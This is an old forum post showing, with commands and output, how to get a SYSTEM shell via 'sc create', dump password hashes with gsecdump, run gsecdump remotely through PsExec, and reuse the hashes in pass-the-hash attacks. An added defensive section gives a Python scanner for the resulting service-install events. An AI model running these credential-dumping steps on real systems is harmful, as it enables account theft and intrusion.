Hash injection attack

Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to import the hash information just captured with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, do not need to be cracked at all; this is just a matter of using the tools. As the original article puts it well, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
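From the defender's side, both things the post relies on, a command interpreter registered as a service with sc create (type= interact, started as LocalSystem) and PsExec's service-based remote execution with -s, leave a service-installation record in the Windows System log (Event ID 7045, "A service was installed in the system"). The following is an added example, not code from the post or from the gsecdump/PsExec authors: a small Python scanner that parses constructed key=value renderings of such events and flags the two patterns. The key=value line layout, the sample service names and paths other than those shown in the post, and the field names are assumptions of this example, not a real log export format.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines (not a real Windows export) in a simplified key=value rendering
# of System-log Event ID 7045 ("A service was installed in the system"). The field names
# mirror that event's fields; the service "shellcmdline" and its ImagePath come from the post,
# the remaining services are made up for contrast.
SAMPLE_LOG = """\
EventID=7045 ServiceName=shellcmdline ImagePath="C:\\WINDOWS\\system32\\cmd.exe /K start" ServiceType="user mode service" StartType="demand start" Account=LocalSystem
EventID=7045 ServiceName=PSEXESVC ImagePath="%SystemRoot%\\PSEXESVC.exe" ServiceType="user mode service" StartType="demand start" Account=LocalSystem
EventID=7045 ServiceName=Spooler ImagePath="C:\\WINDOWS\\system32\\spoolsv.exe" ServiceType="user mode service" StartType="auto start" Account=LocalSystem
EventID=7036 ServiceName=shellcmdline State=stopped
"""

# key=value pairs; a value is either a double-quoted string (may contain spaces) or a bare token.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Interpreters that have no business being the ImagePath of a freshly installed service.
SHELL_BINARIES = ("cmd.exe", "powershell.exe")


@dataclass
class Finding:
    service: str
    reason: str


def parse_line(line: str) -> dict:
    """Turn one constructed key=value log line into a dict of field -> value."""
    return {key: (quoted if quoted else bare) for key, quoted, bare in FIELD_RE.findall(line)}


def check_service_install(event: dict) -> Optional[Finding]:
    """Return a Finding if a 7045 service-install event matches a known abuse pattern."""
    if event.get("EventID") != "7045":
        return None
    name = event.get("ServiceName", "")
    image = event.get("ImagePath", "").lower()
    # Pattern 1: the post's sc create trick, a command shell registered as a service.
    if any(binary in image for binary in SHELL_BINARIES):
        return Finding(name, "command interpreter registered as a service (SYSTEM shell via sc create)")
    # Pattern 2: PsExec drops and installs its PSEXESVC service on the target before running the command.
    if name.upper() == "PSEXESVC" or "psexesvc.exe" in image:
        return Finding(name, "PsExec service installed (remote command execution)")
    return None


def scan(log_text: str) -> List[Finding]:
    """Scan a block of log lines and collect every match."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        finding = check_service_install(parse_line(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"ALERT service={f.service}: {f.reason}")
```

Running the block prints two alerts, one for shellcmdline and one for PSEXESVC, and stays silent on the legitimate Spooler install and on the unrelated 7036 state-change event. In a real deployment the same two checks would be written against the fields of the exported event rather than this constructed layout; the point is that the technique cannot avoid creating the service, so the install record is the thing to watch.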